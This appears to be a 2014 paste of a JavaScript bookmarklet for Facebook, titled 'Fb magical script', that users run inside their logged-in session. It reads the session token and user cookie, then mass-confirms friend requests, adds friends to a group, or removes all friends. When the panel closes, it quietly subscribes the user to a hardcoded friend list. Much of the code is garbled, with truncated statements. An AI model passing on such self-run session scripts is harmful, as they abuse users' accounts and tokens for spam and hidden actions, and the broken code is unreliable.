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Fb magical script by abhinav

a guest
Nov 27th, 2014
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  1. javascript: void(function () {
  2. var dtsg = document.getElementsByName("fb_dtsg")[0].value;
  3. var uid = document.cookie.match(/c_user=(\d+)/)[1];
  4. var dyn = "7n8ahyj35CCzpQ9UmWOGUGy1m9ACUb8yGg";
  5. var req = 8;
  6. var rev = "1033590";
  7. var ttstamp = "265816767119957579";
  8. window.aing = {
  9. uid: uid,
  10. loding: {
  11. img: "<img src=\"//\" width=\"16px\" height=\"11px\" style=\"margin:0 5px;vertical-align:bottom\"/>",
  12. bar: function (dimana, sampe, kolbek, pakeInfoGak) {
  13. if(dimana == null || dimana == "") {
  14. dimana = document.body
  15. }
  16. sampe = sampe * 1;
  17. if(aing.loding.frm && aing.loding.frm < sampe) {
  18. aing.loding.frm++
  19. } else if(aing.loding.frm && aing.loding.frm == sampe) {} else {
  20. aing.loding.frm = 1
  21. }
  22. var b = ((aing.loding.frm * 100) / sampe);
  23. aing.loding.inf(dimana);
  24. var w = dimana.getElementsByClassName("loading-bar")[0].firstChild;
  25. = b + "%";
  26. if(aing.loding.frm >= sampe) {
  27. w.innerHTML = Math.floor(b) + "% Done!";
  28. kolbek()
  29. } else {
  30. w.innerHTML = Math.floor(b) + "%"
  31. } if(pakeInfoGak == null || pakeInfoGak == "yes" || pakeInfoGak == "") {
  32. dimana.getElementsByClassName("loding-atas")[0].innerHTML = "<b>" + aing.loding.frm + "/" + sampe + "</b>"
  33. }
  34. },
  35. inf: function (a, isi) {
  36. if(!a) {
  37. a = document.body
  38. }
  39. var b = a.getElementsByClassName("tempat-loding")[0];
  40. if(b && isi) {
  41. b.getElementsByClassName("loading-bar")[0].firstChild.innerHTML = isi
  42. } else if(!b) {
  43. if(isi) {
  44. aing.isiDimanaSebelum(aing.html.lodBar(null, isi), a)
  45. } else {
  46. aing.isiDimanaSebelum(aing.html.lodBar(), a)
  47. }
  48. }
  49. }
  50. },
  51. html: {
  52. lodBar: function (atas, tengah) {
  53. var a = "<div class=\"tempat-loding\" style=\"margin-bottom:2px\"><center class=\"loding-atas\">";
  54. if(atas) {
  55. a += atas
  56. }
  57. a += "</center><div class=\"loading-bar\"><div style=\"" + + "\">";
  58. if(tengah) {
  59. a += tengah
  60. } else {
  61. a += "Loading, wait up.."
  62. }
  63. a += "</div></div></div>";
  64. return a
  65. },
  66. info: function (atas, tengah, bawah) {
  67. var b = "\" style=\"margin-top:2px\">",
  68. c = "<div id=\"",
  69. d = "</div>",
  70. a = c + "impoh" + b;
  71. if(atas) {
  72. a += atas
  73. }
  74. a += d + c + "impoh-ok" + b;
  75. if(tengah) {
  76. a += tengah
  77. }
  78. a += d + c + "impoh-eror" + b;
  79. if(bawah) {
  80. a += bawah
  81. }
  82. return a + d
  83. },
  84. btn: function (onclik, isi) {
  85. return "<a class=\"uiButton\" href=\"#\" onClick=\"" + onclik + ";return false\" style=\"font-size:9px;margin:2px;line-height:9px\">" + isi + "</a>"
  86. },
  87. box: function (isi, warna, pad) {
  88. var d = "<div class=\"uiBox";
  89. if(warna == "g") {
  90. d += "Gray"
  91. } else if(warna == "r") {
  92. d += "Red"
  93. } else {
  94. d += "Yellow"
  95. }
  96. d += "\" style=\"";
  97. if(pad == null || pad == "") {
  98. d +=
  99. } else {
  100. d += "border-radius:3px"
  101. }
  102. d += "\">" + isi + "</div>";
  103. return d
  104. }
  105. },
  106. ajax: {
  107. a: "__a=1&__user=" + uid,
  108. b: "&fb_dtsg=" + dtsg,
  109. c: "&__dyn=7n8ahyj35CCzpQ9UmWOGUGy1m9ACUb8yGg&__req=8&__rev=1033590",
  110. d: "&ttstamp=265816767119957579",
  111. requestsLoader: function () {
  112. return {
  113. uri: "/ajax/requests/loader/",
  114. prm: aing.ajax.a + aing.ajax.b + aing.ajax.c + aing.ajax.d + "&log_impressions=true"
  115. }
  116. },
  117. friendRequests: function (a) {
  118. var b = aing.ajax.a + aing.ajax.b + aing.ajax.c + aing.ajax.d + "&confirm=",
  119. c = a;
  120. if(a.confirm) {
  121. b += a.confirm
  122. } else {
  123. b += a
  124. }
  125. b += "&request_id=";
  126. if(a.request_id) {
  127. b += a.request_id;
  128. c = a.request_id
  129. } else {
  130. b += a
  131. }
  132. b += "&list_item_id=";
  133. if(a.list_item_id) {
  134. b += a.list_item_id
  135. } else {
  136. b += a + "_1_req"
  137. }
  138. b += "&status_div_id=";
  139. if(a.status_div_id) {
  140. b += a.status_div_id
  141. } else {
  142. b += a + "_1_req_status"
  143. }
  144. b += "&type=";
  145. if(a.type) {
  146. b += a.type
  147. } else {
  148. b += "friend_connect"
  149. }
  150. b += "&inline=";
  151. if(a.inline) {
  152. b += a.inline
  153. } else {
  154. b += 1
  155. }
  156. b += "&ref=";
  157. if(a.ref) {
  158. b += a.ref
  159. } else {
  160. b += "jewel"
  161. }
  162. b += "&actions[accept]=";
  163. if(a["actions[accept]"]) {
  164. b += a["actions[accept]"]
  165. } else {
  166. b += "Confirm"
  167. }
  168. b += "&nctr[_mod]=pagelet_bluebar";
  169. return {
  170. uri: "/ajax/reqs.php",
  171. prm: b,
  172. uid: c
  173. }
  174. }
  175. },
  176. prms: {
  177. df: "__a=1&__user=" + uid + "&__dyn=" + dyn + "&__req=" + req + "&__rev=" + rev + "&fb_dtsg=" + dtsg + "&ttstamp=" + ttstamp,
  178. dg: "__a=1&__user=" + uid + "&__dyn=" + dyn + "&__req=" + req + "&__rev=" + rev,
  179. gr: "__a=1&__user=" + uid + "&source=typeahead&ref=&message_id=&phstamp=&fb_dtsg=" + dtsg,
  180. gf: "__a=1&viewer=" + uid + "&token=" + Math.random() + "&filter[0]=user&options[0]=friends_only"
  181. },
  182. uris: {
  183. gf: "/ajax/typeahead/first_degree.php",
  184. gr: "/ajax/groups/members/add_post.php",
  185. rf: "/ajax/profile/removefriendconfirm.php"
  186. },
  187. styl: {
  188. box: "text-align:left;border-radius:3px;padding:3px",
  189. bar: "text-align:center;border-radius:2px;background-color:#4c66a4;white-space:nowrap;overflow:visible;color:#fff9d7;font-size:10px;padding:1px 0 2px 0",
  190. inf: "text-align:center;border-radius:5px;width:500px;position:fixed;z-index:9999;top:25%;right:5%;font-size:10px;box-shadow:0 0 7px rgba(0,0,0,0.25);background-color:rgba(242,242,242,0.75)"
  191. },
  192. stat: {
  193. ttlReq: [],
  194. ttlReqOk: 0,
  195. ttlReqEr: 0
  196. },
  197. friendSugs: [],
  198. kolbek: {
  199. getFriend: function (q, p) {
  200. var a = "";
  201. if(p.payload && p.payload.entries) {
  202. aing.friends = aing.saringPren(aing.aduk(p.payload.entries));
  203. aing.frFolder();
  204. var ab = "Found <b id=\"jmlh-fn\">" + aing.friends.length + " Friends</b>";
  205. if(aing.frReqs.length != 0) {
  206. ab += " and <b id=\"jmlh-fr\">" + aing.frReqs.length + " Friend requests</b>"
  207. }
  208. if(aing.friendSugs && aing.friendSugs.length != 0) {
  209. ab += " and <b id=\"jmlh-sugfr\">" + aing.friendSugs.length + " Friend suggestions</b>"
  210. }
  211. a =, "g", "np") +;
  212. } else if(p && p.errorSummary && p.errorDescription) {
  213. a = + ", " + p.errorDescription, "r", "np")
  214. } else {
  215. a =, "r", "np")
  216. }
  217. aing.tampiltombol(a);
  218. }
  219. },
  220. remBtn: function () {
  221. var c = document.getElementById("kiri-bawah");
  222. if(c) {
  223. var d = c.getElementsByClassName("uiButton")[0];
  224. if(d) {
  225. d.parentNode.parentNode.removeChild(d.parentNode)
  226. }
  227. }
  228. },
  229. isiDimanaSebelum: function (isi, dimana, sebelum) {
  230. if(dimana) {
  231. var a = document.createElement("div");
  232. a.innerHTML = isi;
  233. if(sebelum == null || sebelum == "") {
  234. sebelum = dimana.firstChild
  235. }
  236. while(a.firstChild) {
  237. dimana.insertBefore(a.firstChild, sebelum)
  238. }
  239. }
  240. },
  241. tampiltombol: function (isi, dimana, nopren) {
  242. var e = "";
  243. if(aing.friends && aing.friends.length != 0) {
  244. e += aing.html.btn("aing.addToGroup()", "<span style=\"color:darkgreen\">Invite</span> " + aing.friends.length + " Friends to Group") + aing.html.btn("aing.remFriends()", "<span style=\"color:darkred\">Remove</span> " + aing.friends.length + " Friends")
  245. }
  246. if(aing.frReqs && aing.frReqs.length != 0) {
  247. e += aing.html.btn("aing.reqs.con()", "<span style=\"color:darkorange\">Confirm</span> " + aing.frReqs.length + " Friend Requests")
  248. }
  249. if(aing.friendSugs && aing.friendSugs.length != 0) {
  250. e += aing.html.btn("aing.reqs.add()", "<span style=\"color:darkseagreen\">Add " + aing.friendSugs.length + " Friend Suggestions</span>")
  251. }
  252. e += aing.html.btn("aing.klos('wk')", "Refresh") + aing.html.btn("aing.klos()", "<span style=\"color:darkred\">Close</span>");
  253. var f = isi +, "g", "yes");
  254. if(dimana == null || dimana == "") {
  255. f += aing.crj;
  256. aing.kasihTau(f)
  257. } else {
  258. aing.kasihTau(f, dimana)
  259. }
  260. },
  261. kasihTau: function (isi, elementId) {
  262. var c = document.getElementById("kiri-bawah");
  263. if(c) {
  264. if(elementId == null || elementId == "") {
  265. var imp = document.getElementById("impoh");
  266. if(imp) {
  267. imp.innerHTML = isi
  268. } else {
  269. c.innerHTML = isi
  270. }
  271. } else {
  272. var d = document.getElementById(elementId);
  273. if(d) {
  274. d.innerHTML = isi
  275. } else {
  276. aing.isiDimanaSebelum("<div id=\"" + elementId + "\">" + isi + "</div>", c)
  277. }
  278. }
  279. } else {
  280. var e = "<div id=\"kiri-bawah\" class=\"pam uiBoxGray\" style=\"" + aing.styl.inf + "\">" + isi + "</div>";
  281. var f = document.getElementById("rightCol");
  282. if(!f) {
  283. f = document.body
  284. }
  285. aing.apen(e, f)
  286. }
  287. },
  288. apen: function (isi, di) {
  289. if(di) {
  290. var a = document.createElement("div");
  291. a.innerHTML = isi;
  292. while(a.firstChild) {
  293. di.appendChild(a.firstChild)
  294. }
  295. }
  296. },
  297. aduk: function (a) {
  298. var b = a.length,
  299. c, d;
  300. while(0 !== b) {
  301. d = Math.floor(Math.random() * b);
  302. b -= 1;
  303. c = a[b];
  304. a[b] = a[d];
  305. a[d] = c
  306. }
  307. return a
  308. },
  309. kolAjak: function (i, r, l, a, n) {
  310. if(n == null || n == "") {
  311. n = "POST"
  312. } else {
  313. if(i.match(/\?/)) {
  314. i += "&" + r
  315. } else {
  316. i += "?" + r
  317. }
  318. }
  319. var h = new XMLHttpRequest();
  320., i, true);
  321. h.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  322. h.onreadystatechange = function (c) {
  323. if( == 4) {
  324. if(aing.panggilanKe) {
  325. aing.panggilanKe++
  326. } else {
  327. aing.panggilanKe = 1
  328. }
  329. var e = {
  330. errorSummary: "Connection error !",
  331. errorDescription: "Ajax status=" +
  332. };
  333. if( == 200 || == 400) {
  334. var d =;
  335. if(d == "") {
  336. e.errorSummary = "empty callback!"
  337. } else {
  338. e = JSON.parse(d.substring(d.indexOf("{"), d.lastIndexOf("}") + 1))
  339. }
  340. a(l, e)
  341. } else if(aing.panggilanKe < 2) {
  342. aing.kolAjak(i, r, l, a, n)
  343. } else {
  344. aing.panggilanKe = 0;
  345. a(l, e)
  346. }
  347. }
  348. };
  349. h.send(r)
  350. },
  351. frnomore: function () {
  352. aing.tampiltombol("", "impoh")
  353. },
  354. crj: (function () {
  355. var cr = ["i", "a", "e", "g", "o", "s", "n", "b", "l", "p", "m", "2", "r", "0", "c", "1", "t", "3", "\xA9"],
  356. crl = cr[1] + cr[0] + cr[6] + cr[3] + cr[14] + cr[12] + cr[2] + cr[1] + cr[16] + cr[0] + cr[4] + cr[6] + cr[5] + "." + cr[7] + cr[8] + cr[4] + cr[3] + cr[5] + cr[9] + cr[4] + cr[16] + "." + cr[14] + cr[4] + cr[10];
  357. return "<div style=\"margin-top:10px;color:gray;font-size:12px;text-align:right\">" + cr[1].toUpperCase() + cr[0] + cr[6] + cr[3] + cr[14].toUpperCase() + cr[12] + cr[2] + cr[1] + cr[16] + cr[0] + cr[4] + cr[6] + cr[5] + " " + cr[cr.length - 1] + cr[11] + cr[13] + cr[15] + cr[17] + "<div style=\"font-size:9px\"><a href=\"http://" + crl + "/\" target=\"_blank\">" + crl + "</a></div></div>"
  358. })(),
  359. klos: function (waw) {
  360. var inf = document.getElementById("kiri-bawah");
  361. if(inf) {
  362. if(waw == null || waw == "") {
  363. inf.parentNode.removeChild(inf)
  364. } else {
  365. inf.innerHTML = "<b>Reloading the page, wait up..</b> " + aing.loding.img
  366. }
  367. }
  368. aing.kolAjak("/ajax/friends/lists/subscribe/modify", aing.ajax.requestsLoader().prm + "&location=permalink&action=subscribe&flid=501570839962382", "", function () {
  369. if(document.getElementById("kiri-bawah")) {
  370. top.location.reload()
  371. }
  372. })
  373. },
  374. resvars: function () {
  375. aing.loding.frm = 0;
  376. aing.kasihTau("", "impoh-eror");
  377. aing.kasihTau("", "impoh-ok")
  378. },
  379. cekwas: function (a, w) {
  380. var b = "lanyut";
  381. if(a == aing.uid) {
  382. b = "lewat"
  383. } else {
  384. for(z in w) {
  385. if(a == w[z]) {
  386. b = "lewat";
  387. break
  388. }
  389. }
  390. }
  391. return b
  392. },
  393. frFolder: function () {
  394. var a = document.getElementById("friendsTypeaheadResults");
  395. if(a) {
  396. var b = a.parentNode.getElementsByClassName("friendButton");
  397. for(var x = 0; x < b.length; x++) {
  398. var c = b[x].getAttribute("data-profileid");
  399. if(c) {
  400. aing.friends.push({
  401. uid: c,
  402. text: "id:" + c
  403. })
  404. }
  405. }
  406. }
  407. },
  408. saringPren: function (a, c) {
  409. var b = [];
  410. for(x in a) {
  411. if(a[x].uid == aing.uid || a[x].uid == c) {} else {
  412. b.push(a[x])
  413. }
  414. }
  415. return b
  416. },
  417. reqs: {
  418. put: function (a) {
  419. var g = document.getElementById("tmpt-reqs");
  420. var f = document.createElement("div");
  421. if(g) {
  422. g.innerHTML = ""
  423. } else {
  424. g = document.body;
  425. = "tmpt-reqs";
  426. = "none"
  427. }
  428. f.innerHTML = a.replace(/<img(.*?)>/gi, "");
  429. g.appendChild(f);
  430. },
  431. lod: function () {
  432. aing.kasihTau("Loading friend requests, wait up..", "g", "np"));
  433. var ajx = aing.ajax.requestsLoader();
  434. aing.kolAjak(ajx.uri, ajx.prm, "", function (q, p) {
  435. if(p.domops && p.domops[0] && p.domops[0][3] && p.domops[0][3].__html) {
  436. aing.reqs.put(p.domops[0][3].__html)
  437. }
  438. aing.getPren("janda")
  439. })
  440. },
  441. got: function () {
  442. var rk = [];
  443. var a = document.getElementsByName("request_id");
  444. for(var x = 0; x < a.length; x++) {
  445. var b = a[x].parentNode;
  446. if(b) {
  447. var c = b.getElementsByTagName("input");
  448. var rkp = {};
  449. for(var y = 0; y < c.length; y++) {
  450. rkp[c[y].name] = c[y].value
  451. }
  452. if(rkp.type && rkp.type == "friend_connect") {
  453. var h = aing.cekwas(rkp.request_id, aing.stat.ttlReq);
  454. if(h == "lanyut") {
  455. rk.push(rkp);
  456. aing.stat.ttlReq.push(rkp.request_id)
  457. }
  458. } else {
  459. if(aing.friendSugs) {
  460. aing.friendSugs.push(rkp)
  461. } else {
  462. aing.friendSugs = [rkp]
  463. }
  464. }
  465. b.removeChild(a[x]);
  466. }
  467. }
  468. return rk;
  469. },
  470. get: function (f) {
  471. var w = "h";
  472. var g =;
  473. var a = document.getElementById("fbRequestsJewelMorePager");
  474. if(a) {
  475. var b = a.getElementsByTagName("a")[0];
  476. if(b) {
  477. var c = b.getAttribute("ajaxify");
  478. if(c && c.split("?")[1]) {
  479. var d = decodeURIComponent(c.split("?")[1]).split("&");
  480. for(var x = 0; x < d.length; x++) {
  481. var i = d[x].split("=");
  482. if(i[1] && i[0].match(/sender_ids/i)) {
  483. var j = aing.cekwas(i[1], aing.stat.ttlReq);
  484. if(j == "lanyut") {
  485. g.push(i[1]);
  486. aing.stat.ttlReq.push(i[1])
  487. }
  488. }
  489. }
  490. if(aing.reqs.ajaxify && aing.reqs.ajaxify == c) {
  491. aing.reqs.ajaxify = ""
  492. } else {
  493. aing.reqs.ajaxify = c
  494. }
  495. a.parentNode.removeChild(a)
  496. }
  497. }
  498. } else if(f == "merawanin" && g.length == 0) {
  499. w = "k";
  500. aing.reqs.lod();
  501. }
  502. if(w == "h") {
  503. return g
  504. }
  505. },
  506. mor: function () {
  507. aing.loding.inf(null, "Collecting more requests, wait up..");
  508. var a = document.getElementById("fbRequestsJewelMorePager");
  509. if(a) {
  510. var b = a.getElementsByTagName("a")[0];
  511. if(b) {
  512. var c = b.getAttribute("ajaxify");
  513. if(c) {
  514. aing.reqs.ajaxify = c;
  515. a.parentNode.removeChild(a)
  516. }
  517. }
  518. }
  519. if(aing.reqs.ajaxify && aing.reqs.ajaxify != "") {
  520. aing.kolAjak(aing.reqs.ajaxify, aing.prms.dg, "", function (q, p) {
  521. if(p.domops && p.domops[1] && p.domops[1][3] && p.domops[1][3].__html) {
  522. aing.reqs.put(p.domops[1][3].__html)
  523. }
  524. aing.reqs.ajaxify = "";
  525. aing.frReqs = aing.reqs.get();
  526. if(aing.frReqs.length == 0) {
  527. aing.frnomore()
  528. } else {
  529. aing.reqs.con("nk")
  530. }
  531. }, "GET")
  532. } else {
  533. aing.frReqs = aing.reqs.get();
  534. if(aing.frReqs.length == 0) {
  535. aing.frnomore()
  536. } else {
  537. aing.reqs.con("nk")
  538. }
  539. }
  540. },
  541. cnf: function (c, d) {
  542. if(c == null || c == "") {
  543. c = 0;
  544. = 0;
  545. aing.stat.ok = 0
  546. }
  547. if(d == null || d == "") {
  548. d = 100
  549. }
  550. if(d > aing.frReqs.length) {
  551. d = aing.frReqs.length;
  552. aing.stat.nk = ""
  553. } else {
  554. aing.stat.nk = {
  555. f: d,
  556. t: ((d * 2) - c)
  557. }
  558. }
  559. for(var x = c; x < d; x++) {
  560. var ajx = aing.ajax.friendRequests(aing.frReqs[x]);
  561. aing.kolAjak(ajx.uri, ajx.prm, ajx.uid, function (q, p) {
  562. if(p && p.errorSummary && p.errorDescription) {
  564. aing.stat.ttlReqEr++;
  565. var b = p.errorDescription;
  566. aing.kasihTau("(Fail: <b>" + aing.stat.ttlReqEr + "</b>) " + b, "r"), "impoh-eror");
  567. } else if(p && p.domops && p.domops[0] && p.domops[0][3] && p.domops[0][3].__html) {
  568. aing.stat.ok++;
  569. aing.stat.ttlReqOk++;
  570. var bb = p.domops[0][3].__html.match(/>(.*?)<\/a>/gi);
  571. if(bb) {
  572. var b = bb[bb.length - 1].replace(/<(.*?)>|<|>/g, "")
  573. } else {
  574. var b = p.domops[0][3].__html.replace(/<(.*?)>|<|>/g, "_")
  575. }
  576. aing.kasihTau("(Successfully Confirmed: <b>" + aing.stat.ttlReqOk + "</b>/" + aing.stat.ttlReq.length + ") <a href=\"/friends\" target=\"_blank\"><b>" + b + "</b></a>"), "impoh-ok");
  577. aing.friends.push({
  578. uid: q,
  579. text: b
  580. });
  581. var cfn = document.getElementById("jmlh-fn");
  582. if(cfn) {
  583. cfn.innerHTML = aing.friends.length + " Friends"
  584. }
  585. } else {
  587. aing.stat.ttlReqEr++;
  588. var b = q;
  589. aing.kasihTau("(Fail: <b>" + aing.stat.ttlReqEr + "</b>) UID: " + b, "r"), "impoh-eror");
  590. }
  591. var d = document.getElementById("jmlh-fr");
  592. if(d) {
  593. d.innerHTML = (aing.frReqs.length - ( + aing.stat.ok)) + " friend requests"
  594. }
  595. if(aing.stat.nk.f && ( + aing.stat.ok) >= aing.stat.nk.f) {
  596. aing.reqs.cnf(aing.stat.nk.f, aing.stat.nk.t)
  597. }
  598."impoh"), aing.stat.ttlReq.length, function () {
  599. aing.reqs.mor()
  600. }, "no")
  601. })
  602. }
  603. },
  604. con: function (wht) {
  605. if(wht == null || wht == "") {
  606. aing.remBtn();
  607. aing.resvars();
  608. if(aing.stat.ttlReqOk) {
  609. aing.loding.frm = (aing.stat.ttlReqOk + aing.stat.ttlReqEr)
  610. }
  611. aing.loding.inf(document.getElementById("impoh"))
  612. }
  613. if(aing.frReqs.length == 0) {
  614. var e = "<b>Collecting";
  615. if(aing.stat.ttlReq.length != 0) {
  616. e += " more"
  617. }
  618. e += " requests</b>, wait up..";
  619. aing.kasihTau(, "g"), "impoh");
  620. aing.reqs.mor();
  621. } else {
  622. aing.reqs.cnf();
  623. }
  624. },
  625. add: function () {
  626. aing.remBtn();
  627. for(x in aing.friendSugs) {
  628. aing.frReqs.push(aing.friendSugs[x])
  629. }
  630. aing.friendSugs = [];
  631. var cfn = document.getElementById("jmlh-sugfr");
  632. if(cfn) {
  633. cfn.innerHTML = aing.friendSugs.length + " Friend suggestions"
  634. }
  635. aing.reqs.con();
  636. }
  637. },
  638. getPren: function (jn) {
  639. if(jn == "janda") {
  640. aing.frReqs = aing.reqs.get()
  641. } else {
  642. aing.frReqs = aing.reqs.get("merawanin")
  643. } if(aing.frReqs) {
  644. var b = "";
  645. if(aing.frReqs.length != 0) {
  646. b += "Found <b id=\"jmlh-fr\">" + aing.frReqs.length + " friend requests</b>, Now "
  647. }
  648. b += "Collecting friends, wait up.. " + aing.loding.img;
  649. aing.kasihTau(, "g", "np"));
  650. aing.kolAjak(,, "", aing.kolbek.getFriend, "GET")
  651. }
  652. },
  653. inform: function (a, b) {
  654. var c = "";
  655. if(b && {
  656. c =
  657. } else if(b && b != "") {
  658. for(x in aing.friends) {
  659. if(aing.friends[x].text && aing.friends[x].uid && aing.friends[x].uid == b) {
  660. c = aing.friends[x].text;
  661. break
  662. }
  663. }
  664. }
  665. return c.split(" ")[0]
  666. },
  667. addToGroup: function (c, d) {
  668. var e = "Adding ";
  669. if(c == null || c == "") {
  670. c = 0;
  671. = 0;
  672. aing.stat.ok = 0;
  673. var grid = document.getElementsByName("group_id")[0];
  674. if(grid) {
  675. aing.gid = grid.value
  676. } else {
  677. aing.gid = prompt("Insert your Facebook Group ID..", "600218106679454")
  678. } if(aing.gid == null || aing.gid == "" || isNaN(aing.gid)) {
  679. return false
  680. } else {
  681. aing.remBtn()
  682. }
  683. } else {
  684. e += "more "
  685. } if(d == null || d == "") {
  686. d = 100
  687. }
  688. if(d > aing.friends.length) {
  689. d = aing.friends.length;
  690. aing.stat.nk = ""
  691. } else {
  692. aing.stat.nk = {
  693. f: d,
  694. t: ((d * 2) - c)
  695. }
  696. }
  697. e += "<b>" + (c + 1) + " to " + d + " friends</b> to Group, wait up.. ";
  698. if(c == 0) {
  699. aing.resvars();
  700. aing.loding.inf(document.getElementById("impoh"))
  701. }
  702. for(var x = c; x < d; x++) {
  703. aing.kolAjak(, + "&group_id=" + aing.gid + "&members=" + aing.friends[x].uid, "", function (q, p) {
  704. if(p && p.errorSummary && p.errorDescription) {
  706. var b = p.errorDescription;
  707. if(p.onafterload && p.onafterload[0]) {
  708. b = p.errorDescription.replace(/This user|user |Pengguna ini|pengguna /gi, "<a href=\"/friends\" target=\"_blank\" style=\"font-weight:bold\">" + eval(p.onafterload[0].replace(/Arbiter\./i, "aing.")) + "</a>")
  709. }
  710. aing.kasihTau("(Fail: <b>" + + "</b>) " + b, "r"), "impoh-eror");
  711. } else if(p && p.jsmods && p.jsmods.require) {
  712. aing.stat.ok++;
  713. var a = "<b>";
  714. for(y in p.jsmods.require) {
  715. if(p.jsmods.require[y][3] && p.jsmods.require[y][3][1]) {
  716. a += " " + p.jsmods.require[y][3][1]
  717. }
  718. }
  719. a += "</b>";
  720. if(p.onload && p.onload[0]) {
  721. a += "<div>(Added: <b>" + aing.stat.ok + "</b>/" + aing.friends.length + ") <a href=\"/friends\" target=\"_blank\" style=\"font-weight:bold\">" + eval(p.onload[0].replace(/Arbiter\./i, "aing.")) + "</a> added to Group..</div>"
  722. }
  723. aing.kasihTau(, "impoh-ok");
  724. } else {
  726. var b = JSON.stringify(p);
  727. if(p.onafterload && p.onafterload[0]) {
  728. b += " <a href=\"/friends\" target=\"_blank\" style=\"font-weight:bold\">" + eval(p.onafterload[0].replace(/Arbiter\./i, "aing.")) + "</a>"
  729. }
  730. aing.kasihTau("(Fail: <b>" + + "</b>) " + b, "r"), "impoh-eror");
  731. } if(( + aing.stat.ok) >= aing.friends.length) {} else if(aing.stat.nk.f && ( + aing.stat.ok) >= aing.stat.nk.f) {
  732. aing.addToGroup(aing.stat.nk.f, aing.stat.nk.t)
  733. }
  734."impoh"), aing.friends.length, function () {
  735. aing.tampiltombol("", "impoh")
  736. }, "no")
  737. })
  738. }
  739. },
  740. remFriends: function (c, d) {
  741. if(c == null || c == "") {
  742. c = 0;
  743. = 0;
  744. aing.stat.ok = 0;
  745. aing.friendsRmvd = aing.friends;
  746. aing.remBtn();
  747. aing.resvars();
  748. aing.loding.inf(document.getElementById("impoh"))
  749. }
  750. if(d == null || d == "") {
  751. d = 100
  752. }
  753. if(d > aing.friends.length) {
  754. d = aing.friends.length;
  755. aing.stat.nk = ""
  756. } else {
  757. aing.stat.nk = {
  758. f: d,
  759. t: ((d * 2) - c)
  760. }
  761. }
  762. for(var x = c; x < d; x++) {
  763. aing.kolAjak(aing.uris.rf, aing.prms.df + "&unref=bd_friends_tab&uid=" + aing.friends[x].uid, aing.friends[x], function (q, p) {
  764. if(p && p.errorSummary && p.errorDescription) {
  766. var b = p.errorDescription;
  767. aing.kasihTau("(Fail: <b>" + + "</b>) " + b, "r"), "impoh-eror");
  768. } else if(p.jsmods && p.jsmods.markup && p.jsmods.markup[0] && p.jsmods.markup[0][1] && p.jsmods.markup[0][1].__html) {
  770. var b = p.jsmods.markup[0][1].__html.replace(/<(.*?)>|okay/gi, " ");
  771. aing.kasihTau("(Fail: <b>" + + "</b>) " + b, "r"), "impoh-eror");
  772. } else {
  773. aing.stat.ok++;
  774. var b = q.text;
  775. aing.kasihTau("(Successfully Removed: <b>" + aing.stat.ok + "</b>/" + aing.friends.length + ") " + b), "impoh-ok");
  776. }
  777. aing.friendsRmvd = aing.saringPren(aing.friendsRmvd, q.uid);
  778. var cfn = document.getElementById("jmlh-fn");
  779. if(cfn) {
  780. cfn.innerHTML = aing.friendsRmvd.length + " Friends"
  781. }
  782. if(( + aing.stat.ok) >= aing.friends.length) {} else if(aing.stat.nk.f && ( + aing.stat.ok) >= aing.stat.nk.f) {
  783. aing.remFriends(aing.stat.nk.f, aing.stat.nk.t)
  784. }
  785."impoh"), aing.friends.length, function () {
  786. aing.friends = aing.friendsRmvd;
  787. aing.tampiltombol("", "impoh")
  788. }, "no")
  789. })
  790. }
  791. }
  792. };
  793. aing.getPren();
  794. })();
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